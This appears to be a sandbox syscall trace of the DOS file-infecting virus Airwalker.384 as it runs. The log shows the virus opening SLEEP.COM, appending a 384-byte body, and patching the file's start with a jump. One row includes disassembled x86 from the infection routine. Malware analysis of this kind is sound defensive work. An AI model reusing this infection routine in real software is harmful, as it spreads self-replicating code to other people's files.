.
| Time | Syscall Op | Syscall Name |
|---|---|---|
| 2018-12-17T22:48:16.179185461Z | 26 | PC: 12ab3 | Set disk transfer address |
| 2018-12-17T22:48:16.180289273Z | 78 | PC: 12abf | Find first file |
| 2018-12-17T22:48:16.187659298Z | 61 | PC: 12afe | Open file (Filename = 'SLEEP.COM') |
| 2018-12-17T22:48:16.195356603Z | 63 | PC: 12b0c | Read file or device (Read 3 bytes on handle 5) |
| 2018-12-17T22:48:16.202921812Z | 66 | PC: 12b1f | Move file pointer |
| 2018-12-17T22:48:16.205371333Z | 44 | PC: 12b2c | Get time 0x12b2c: xchg ch, cl 0x12b2e: add dx, cx 0x12b30: mov word ptr [bp + 0x170], dx 0x12b34: xor word ptr [bp + 0x15b], 0x1717 0x12b3a: xor byte ptr [bp + 0x15d], 0x19 0x12b3f: mov ah, 0x40 0x12b41: mov cx, 0x180 0x12b44: mov dx, bp 0x12b46: pushaw 0x12b47: jmp 0x12bf8 0x12b4a: pop ax 0x12b4b: jb 0x12b75 0x12b4d: sub ax, 3 0x12b50: push bx 0x12b51: mov bx, bp 0x12b53: mov word ptr cs:[bx + 1], ax 0x12b57: mov byte ptr [bx], 0xe9 0x12b5a: pop bx 0x12b5b: mov ax, 0x4200 0x12b5e: xor cx, cx |
| 2018-12-17T22:48:16.208055992Z | 64 | PC: 12bfe | Write file or device (Write 384 bytes on handle 5) |
| 2018-12-17T22:48:16.22202549Z | 66 | PC: 12b63 | Move file pointer |
| 2018-12-17T22:48:16.225266468Z | 64 | PC: 12b6f | Write file or device (Write 3 bytes on handle 5) |
| 2018-12-17T22:48:16.233188947Z | 62 | PC: 12b75 | Close file |
| 2018-12-17T22:48:16.24334931Z | 9 | PC: 12a47 | Display string (String= 'WARNING: You have just released the Airwalker.384 virus! ') |